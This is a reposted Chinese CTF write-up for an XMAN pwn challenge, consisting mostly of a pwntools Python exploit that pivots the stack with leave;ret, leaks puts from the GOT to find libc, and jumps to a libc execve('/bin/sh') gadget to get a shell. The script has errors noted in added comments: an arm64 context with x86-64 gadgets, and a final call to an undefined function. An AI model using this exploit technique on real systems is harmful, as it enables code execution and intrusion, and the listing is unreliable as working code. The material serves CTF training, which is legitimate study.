XMAN【x天】main

前言

很揪心,一直想着用dl_resolve解决,不过好麻烦,不仅要读还要写,还需要泄露地址,不如rop简单。
而且了解到 libc 中 execve('/bin/sh\x00') 的操作,不过由于题目没有 setbuf,缓冲区就很乱,本地能通,远程却打不了。

代码

from pwn import*
import roputils


def attack_remote_rop2():
    """Drive a locally spawned ./main through the two-stage ROP chain of this writeup.

    Despite the name this talks to ``process("./main")``, not a remote
    service. The code is Python 2 / old-pwntools style (str payloads,
    ``raw_input``); under Python 3 the ``'a' * n + p64(...)`` concatenations
    and ``recvuntil`` on a str delimiter would mix str and bytes.
    Returns nothing; it ends in ``conn.interactive()``.
    """
    # NOTE(review): arch='arm64' contradicts the x86-64 gadgets used below
    # (pop rdi / pop rsi / leave; ret). p64 itself is unaffected, but anything
    # that consults context.arch (asm, shellcraft) would be wrong.
    context(arch='arm64', os='linux', endian='little', rename_corefiles=False)
    context.log_level = 'debug'
    context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
    conn = process("./main")
    elf = ELF("./main")  # only referenced by the commented-out log line below
    # Binary-specific constants for this challenge ELF.
    control_ebp = 0x601060 + 0x100   # target frame base for the leave;ret pivot (presumably in .bss, per the comments below)
    leave_ret = 0x40060F
    ret = 0x40061C                   # unused
    puts_plt = 0x4004C0
    puts_got = 0x601018
    read_plt = 0x4004d0              # unused
    pop_rdi = 0x400693
    pop_rsi = 0x400691               # unused
    read_again = 0x4005FC            # unused
    # log.info('puts_got addr ==> 0x%x' % elf.got['puts'])
    # write bss
    raw_input("go?")  # manual pause (e.g. to attach a debugger) before the first send
    # Stage 1, first write: 0x100 bytes of padding, then pop rdi; puts_got; puts@plt; 0x4005C2.
    payload = 'a' * 0x100 + p64(pop_rdi) + \
        p64(puts_got) + p64(puts_plt) + p64(0x4005C2)
    conn.sendline(payload)
    sleep(0.1)  # pacing between sends; presumably so the target's reads do not coalesce them
    # write stack
    # Second write: 0xa bytes of padding, saved-frame-pointer slot, then leave;ret.
    payload = 'a' * 0xa + p64(control_ebp - 8) + p64(leave_ret)
    conn.sendline(payload)
    sleep(0.1)
    # Leak parsing: read up to the first 0x7f byte, keep the last 6 bytes,
    # zero-pad to 8 and decode little-endian. The length is not validated
    # before u64, and a recvuntil that returns short data would fail here
    # rather than at the real cause — one reason this is brittle remotely.
    put_addr = u64((conn.recvuntil('\x7f')[-6:] + '\x00' * 2))
    log.info('put_addr addr ==> 0x%x' % put_addr)
    # put_addr - 0x809c0 is treated as the libc base; the added offsets are
    # specific to the libc build the author matched and are not verified
    # here (a different libc gives different offsets).
    system_addr = (put_addr - 0x809c0) + 0x4f440  # logged only, never sent
    exec_addr = (put_addr - 0x809c0) + 0x4F322    # execve("/bin/sh") call site, per the disassembly below
    '''
    text:000000000004F322                 mov     rax, cs:environ_ptr
    text:000000000004F329                 lea     rdi, aBinSh     ; "/bin/sh"
    text:000000000004F330                 lea     rsi, [rsp+198h+var_158]
    text:000000000004F335                 mov     cs:dword_3ED5E0, 0
    text:000000000004F33F                 mov     cs:dword_3ED5E4, 0
    text:000000000004F349                 mov     rdx, [rax]
    text:000000000004F34C                 call    execve
    '''
    log.info('system_addr addr ==> 0x%x' % system_addr)
    raw_input("go?")
    # write bss two
    conn.sendline('a' * 8)  # Stage 2, first write: 8 filler bytes
    sleep(0.1)
    # write stack
    # Same layout as the first stack write: 0xa padding, 8 filler bytes in the
    # frame-pointer slot, then exec_addr in the return-address slot (presumably).
    payload = 'a' * 0xa + 'a' * 8 + p64(exec_addr)
    conn.sendline(payload)
    sleep(0.1)
    conn.interactive()


# NOTE(review): no attack_remote_dl is defined in this listing; the only
# function above is attack_remote_rop2, so this line raises NameError as
# written. There is also no __main__ guard, so it executes on import.
attack_remote_dl()

总结

-。-可还行


转载自blog.csdn.net/qq_33438733/article/details/81605665